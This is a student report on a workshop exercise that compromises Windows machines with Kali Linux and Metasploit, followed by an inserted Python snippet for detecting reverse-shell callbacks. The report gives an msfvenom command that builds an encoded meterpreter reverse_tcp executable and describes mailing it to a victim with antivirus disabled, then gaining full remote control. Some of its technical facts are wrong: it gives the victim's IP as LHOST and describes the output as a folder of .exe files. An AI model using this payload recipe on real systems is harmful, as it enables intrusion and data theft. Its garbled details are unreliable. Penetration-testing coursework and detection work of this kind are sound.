Kali Linux Metasploit Exploit for Windows Ethical Hacking


Added on  2023/06/05

AI Summary
This report outlines a practical workshop exercise focused on exploiting Windows operating systems (XP, 7, 8, 8.1, and 10) using Kali Linux and the Metasploit framework. The objective was to demonstrate how an attacker could gain unauthorized access and control over a victim's machine. The setup involved two machines on the same NAT network: one running Kali Linux with Metasploit installed, and another running Windows without antivirus software. The process included creating an executable file on the Kali Linux platform, tailored to the target Windows machine's IP address and PORT number, using the 'msfvenom' command. This file was then sent to the target machine. Upon execution of the file on the Windows machine, the Metasploit framework, set in listening mode, established a 'meterpreter' session, granting the attacker full control over the compromised system, enabling actions such as file manipulation, directory navigation, and data exfiltration.
Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date
In the workshop, we came up with a Kali Linux Metasploit exploit whose targets would
mainly be Windows operating systems (Windows XP, 7, 8, 8.1 and 10). This exploit would
enable an attacker to get into the victim’s machine and perform a number of operations just as if
logged in. Metasploit is basically a project that helps in penetration testing and the development
of IDS signatures. The tool helps in the development of exploit code as well as its execution on a
targeted remote machine (Dieterle, 2016).
For this test, our requirements were: the Metasploit framework with all of its Ruby
packages, which we installed on a computer running Kali Linux, and two machines, one
with a Windows operating system and another with Kali Linux. The two machines were
allowed to operate in the same NAT network. Because an antivirus would prevent the attack, we
ensured that the target machine did not have any antivirus software (Holik, Horalek, Marik,
Neradova & Zitta, 2014, p.240). The Metasploit command which we used throughout our
penetration test was Msfconsole, because of its flexibility and the additional features
which support the tools within the framework.
To be in a position to penetrate the second machine, which was running on a
Windows platform, we first had to know the machine’s IP address and one of its free PORT
numbers, which we easily acquired because the two machines were operating in the same
network. The IP address of a machine operating within the same network can be obtained easily
using software called Netcut (Muniz, 2013).
To get a chance of penetrating the second machine, we first created an executable
file within the Kali Linux platform under the IP address and PORT number specification of the
second machine using the command “msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP address of windows machine) LPORT=(PORT in the windows machine) -f exe -e x86/shikata_ga_nai -i 10 > /root/desktop/(desktop name).exe”.
The command allowed us to create an executable folder in the Kali Linux platform
which contained several .exe files. This is the collection of files which we were supposed to send
to the target machine through channels like mail or through the network (Pritchett & De
Smet, 2013).
After we sent the file to the target machine, we had to put our Metasploit
framework into a listening state using the “exploit” command at the Msfconsole handler.
When it is set to listening mode, it waits until the file sent to the victim machine is opened.
When the victim eventually opens the file, “meterpreter” activates itself automatically on the
Kali Linux side.
At this juncture, the attacker is inside the victim’s machine and can carry out several
operations with full control, just like a person who has logged into the system physically. Some
of the activities the attacker can do on the victim’s machine include reading the contents of
files on the screen, changing directories, editing files, deleting files, searching for files,
uploading files, changing local directories, printing local directories, removing directories,
moving source to destination, and printing working directories (Weidman, 2014). This implies
that the attacker has already hacked into the victim’s computer.
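A defender's view of the same chain, as an added example that is not part of the original report: the reverse_tcp payload makes the Windows machine open an outbound connection to the listener as soon as the file is run, so process-creation and network-connection records can be correlated to surface it. The event records are constructed and only loosely modelled on Sysmon event IDs 1 and 3; the field names, paths, addresses, port and the 60-second window are assumptions.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address
import re

# Constructed sample events, loosely modelled on Sysmon process-create (ID 1)
# and network-connect (ID 3) records; field names are simplified assumptions.
EVENTS = [
    {"id": 1, "time": "2023-06-05T10:00:00", "pid": 4120,
     "image": r"C:\Users\alice\Desktop\invoice.exe"},
    {"id": 3, "time": "2023-06-05T10:00:02", "pid": 4120,
     "dst_ip": "10.0.2.15", "dst_port": 8443, "initiated": True},
    {"id": 1, "time": "2023-06-05T10:01:00", "pid": 5200,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"id": 3, "time": "2023-06-05T10:01:01", "pid": 5200,
     "dst_ip": "93.184.216.34", "dst_port": 443, "initiated": True},
    {"id": 1, "time": "2023-06-05T09:00:00", "pid": 6100,
     "image": r"C:\Users\alice\Downloads\setup.exe"},
    {"id": 3, "time": "2023-06-05T10:30:00", "pid": 6100,
     "dst_ip": "10.0.2.20", "dst_port": 8080, "initiated": True},
]

# Folders a user can write to without elevation (assumed list, extend as needed).
USER_WRITABLE = re.compile(r"\\(Desktop|Downloads|AppData|Temp)\\", re.IGNORECASE)
WINDOW = timedelta(seconds=60)  # how soon after launch the callback must occur

def find_suspect_callbacks(events):
    """Return (image, dst_ip, dst_port, internal) for each early outbound
    connection made by a process started from a user-writable folder."""
    started = {}  # pid -> (start time, image path)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 1:
            started[ev["pid"]] = (when, ev["image"])
        elif ev["id"] == 3 and ev["initiated"] and ev["pid"] in started:
            t0, image = started[ev["pid"]]
            if USER_WRITABLE.search(image) and when - t0 <= WINDOW:
                internal = ip_address(ev["dst_ip"]).is_private
                hits.append((image, ev["dst_ip"], ev["dst_port"], internal))
    return hits

if __name__ == "__main__":
    for hit in find_suspect_callbacks(EVENTS):
        print(hit)
```

The `internal` flag marks destinations in private address space, which matches the report's lab where both machines share one NAT network.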
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd.
Weidman, G. (2014). Penetration Testing: A Hands-On Introduction to Hacking. No Starch Press.